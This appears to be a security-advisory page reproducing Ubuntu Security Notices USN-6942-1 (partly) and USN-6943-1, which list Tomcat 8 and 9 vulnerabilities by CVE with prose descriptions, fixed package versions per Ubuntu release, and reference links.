Ubuntu 18.04 LTS  
   gross                           1.0.2-4ubuntu0.18.04.1~esm1  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   gross                           1.0.2-4ubuntu0.16.04.1~esm1  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6942-1  
   CVE-2023-52159

Package Information:  
https://launchpad.net/ubuntu/+source/gross/1.0.2-4ubuntu0.24.04.1  
https://launchpad.net/ubuntu/+source/gross/1.0.2-4ubuntu0.22.04.1  
https://launchpad.net/ubuntu/+source/gross/1.0.2-4ubuntu0.20.04.1

Ubuntu Security Notice USN-6942-1

Ubuntu Security Notice 6943-1 - It was discovered that Tomcat incorrectly handled certain uncommon PersistenceManager with FileStore configurations. A remote attacker could possibly use this issue to execute arbitrary code. This issue only affected tomcat8 for Ubuntu 18.04 LTS It was discovered that Tomcat incorrectly handled certain HTTP/2 connection requests. A remote attacker could use this issue to obtain wrong responses possibly containing sensitive information. This issue only affected tomcat8 for Ubuntu 18.04 LTS

==========================================================================  
Ubuntu Security Notice USN-6943-1  
August 01, 2024

tomcat8, tomcat9 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS  
- Ubuntu 16.04 LTS

Summary:

Several security issues were fixed in Tomcat.

Software Description:  
- tomcat9: Servlet and JSP engine  
- tomcat8: Servlet and JSP engine

Details:

It was discovered that Tomcat incorrectly handled certain uncommon  
PersistenceManager with FileStore configurations. A remote attacker could  
possibly use this issue to execute arbitrary code. This issue only affected  
tomcat8 for Ubuntu 18.04 LTS (CVE-2020-9484)

It was discovered that Tomcat incorrectly handled certain HTTP/2 connection  
requests. A remote attacker could use this issue to obtain wrong responses  
possibly containing sensitive information. This issue only affected tomcat8  
for Ubuntu 18.04 LTS (CVE-2021-25122)

Thomas Wozenilek discovered that Tomcat incorrectly handled certain TLS

packets. A remote attacker could possibly use this issue to cause a denial  
of service. This issue only affected tomcat8 for Ubuntu 18.04 LTS  
(CVE-2021-41079)

Trung Pham discovered that a race condition existed in Tomcat when handling  
session files with FileStore. A remote attacker could possibly use this  
issue to execute arbitrary code. This issue affected tomcat8 for Ubuntu  
16.04 LTS and Ubuntu 18.04 LTS, and tomcat9 for Ubuntu 18.04 LTS and Ubuntu  
20.04 LTS (CVE-2022-23181)

It was discovered that Tomcat's documentation incorrectly stated that  
EncryptInterceptor provided availability protection when running over an  
untrusted network. A remote attacker could possibly use this issue to cause  
a denial of service even if EncryptInterceptor was being used. This issue  
affected tomcat8 for Ubuntu 18.04 LTS, and tomcat9 for Ubuntu 18.04 LTS,  
Ubuntu 20.04 LTS and Ubuntu 22.04 LTS (CVE-2022-29885)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
   tomcat9-docs                    9.0.58-1ubuntu0.1+esm2  
                                   Available with Ubuntu Pro

Ubuntu 20.04 LTS  
   libtomcat9-java                 9.0.31-1ubuntu0.6  
   tomcat9                         9.0.31-1ubuntu0.6  
   tomcat9-docs                    9.0.31-1ubuntu0.6

Ubuntu 18.04 LTS  
   libtomcat8-java                 8.5.39-1ubuntu1~18.04.3+esm2  
                                   Available with Ubuntu Pro  
   libtomcat9-java                 9.0.16-3ubuntu0.18.04.2+esm2  
                                   Available with Ubuntu Pro  
   tomcat8                         8.5.39-1ubuntu1~18.04.3+esm2  
                                   Available with Ubuntu Pro  
   tomcat8-docs                    8.5.39-1ubuntu1~18.04.3+esm2  
                                   Available with Ubuntu Pro  
   tomcat9                         9.0.16-3ubuntu0.18.04.2+esm2  
                                   Available with Ubuntu Pro  
   tomcat9-docs                    9.0.16-3ubuntu0.18.04.2+esm2  
                                   Available with Ubuntu Pro

Ubuntu 16.04 LTS  
   libtomcat8-java                 8.0.32-1ubuntu1.13+esm1  
                                   Available with Ubuntu Pro  
   tomcat8                         8.0.32-1ubuntu1.13+esm1  
                                   Available with Ubuntu Pro

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6943-1  
   CVE-2020-9484, CVE-2021-25122, CVE-2021-41079, CVE-2022-23181,  
   CVE-2022-29885

Package Information:  
   https://launchpad.net/ubuntu/+source/tomcat9/9.0.31-1ubuntu0.6

Tag

#ubuntu